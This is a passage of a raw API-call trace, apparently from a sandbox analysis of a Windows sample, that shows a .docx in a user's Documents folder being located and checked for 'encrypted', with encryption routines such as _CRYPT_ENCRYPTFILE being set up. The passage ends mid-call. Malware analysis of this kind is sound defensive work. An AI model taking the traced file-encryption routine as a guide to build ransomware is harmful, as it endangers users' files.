(HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0033.094] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0033.094] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0033.094] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0033.094] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0033.094] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0033.094] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0033.094] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\hPN6id3lN1N.docx", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ea7d20, ftCreationTime.dwHighDateTime=0x1d57d7e, ftLastAccessTime.dwLowDateTime=0xfd67e2d0, ftLastAccessTime.dwHighDateTime=0x1d5666d, ftLastWriteTime.dwLowDateTime=0xfd67e2d0, ftLastWriteTime.dwHighDateTime=0x1d5666d, nFileSizeHigh=0x0, nFileSizeLow=0xa628, dwReserved0=0x0, dwReserved1=0x777648, cFileName="hPN6id3lN1N.docx", cAlternateFileName="HPN6ID~1.DOC")) returned 0x7c20c0 [0033.095] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0033.095] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0033.095] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0033.095] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0033.095] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0033.095] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0033.095] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0033.095] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0033.095] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0033.095] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0033.095] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0033.095] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0033.095] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0033.095] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0033.095] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0033.095] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0033.095] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14b8 [0033.095] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0033.095] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0033.095] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0033.095] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0033.095] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0033.095] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.095] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0033.095] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0033.095] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0033.095] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0033.095] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0033.095] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0033.095] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0033.095] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0033.095] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0033.096] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0033.096] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0033.096] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0033.096] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0033.096] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0033.096] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0033.096] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0033.096] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0033.096] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\hPN6id3lN1N.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.096] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\hPN6id3lN1N.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.096] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\hPN6id3lN1N.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.096] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\hPN6id3lN1N.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.096] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\hPN6id3lN1N.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.096] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\hPN6id3lN1N.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.096] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\hPN6id3lN1N.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.096] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\hPN6id3lN1N.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.096] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\hPN6id3lN1N.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.096] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\hPN6id3lN1N.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.096] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\hPN6id3lN1N.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.096] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\hPN6id3lN1N.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.096] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\hPN6id3lN1N.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.096] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\hPN6id3lN1N.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.096] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\hPN6id3lN1N.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.096] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\hPN6id3lN1N.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.096] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\hPN6id3lN1N.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.096] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\hPN6id3lN1N.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.096] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\hPN6id3lN1N.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.096] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\hPN6id3lN1N.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.096] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\hPN6id3lN1N.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.096] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\hPN6id3lN1N.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.096] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\hPN6id3lN1N.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.096] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\hPN6id3lN1N.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.096] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\hPN6id3lN1N.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.096] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\hPN6id3lN1N.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.096] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\hPN6id3lN1N.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.096] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\hPN6id3lN1N.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.096] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\hPN6id3lN1N.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.097] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\hPN6id3lN1N.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.097] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\hPN6id3lN1N.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.097] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\hPN6id3lN1N.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.097] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\hPN6id3lN1N.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.097] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\hPN6id3lN1N.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.097] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\hPN6id3lN1N.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.097] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\hPN6id3lN1N.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.097] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\hPN6id3lN1N.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.097] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\hPN6id3lN1N.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.097] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\hPN6id3lN1N.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.097] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\hPN6id3lN1N.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.097] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\hPN6id3lN1N.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.097] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hPN6id3lN1N.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.097] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PN6id3lN1N.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.097] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="N6id3lN1N.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.097] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6id3lN1N.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.097] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="id3lN1N.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.097] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="d3lN1N.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.097] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3lN1N.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.097] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lN1N.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.097] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="N1N.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.097] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0033.097] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0033.097] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0033.097] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0033.097] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0033.097] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0033.097] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0033.097] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0033.097] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0033.097] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c20c0 [0033.097] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.097] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0033.097] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0033.097] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0033.097] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0033.098] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0033.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0033.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af368 [0033.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0033.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0033.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0033.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0033.098] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0033.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af598 [0033.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0033.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0033.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0033.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0033.098] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0033.098] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0033.098] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0033.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0033.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af568 [0033.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0033.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0033.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0033.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0033.098] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0033.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8891d8 [0033.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0033.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0033.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0033.098] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0033.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0033.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0033.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0033.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0033.098] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0033.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0033.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0033.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0033.099] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0033.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0033.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0033.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0033.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0033.099] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0033.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0033.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0033.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0033.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0033.099] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0033.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0033.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0033.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0033.099] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0033.099] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.099] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.099] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.099] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="docx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.099] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".docx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0033.099] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0033.099] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0033.099] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0033.099] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0033.099] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0033.099] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0033.099] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0033.099] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0033.099] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0033.100] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0033.100] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0033.100] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0033.100] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.100] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\hPN6id3lN1N.docx", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ea7d20, ftCreationTime.dwHighDateTime=0x1d57d7e, ftLastAccessTime.dwLowDateTime=0xfd67e2d0, ftLastAccessTime.dwHighDateTime=0x1d5666d, ftLastWriteTime.dwLowDateTime=0xfd67e2d0, ftLastWriteTime.dwHighDateTime=0x1d5666d, nFileSizeHigh=0x0, nFileSizeLow=0xa628, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="hPN6id3lN1N.docx", cAlternateFileName="HPN6ID~1.DOC")) returned 0x7c2240 [0033.100] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0033.100] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0033.100] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0033.100] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0033.100] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0033.100] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.100] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0033.100] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0033.100] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da138 | out: hHeap=0x770000) returned 1 [0033.100] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.100] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0033.100] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.100] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0033.100] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0033.100] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.100] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0033.100] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0033.100] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: 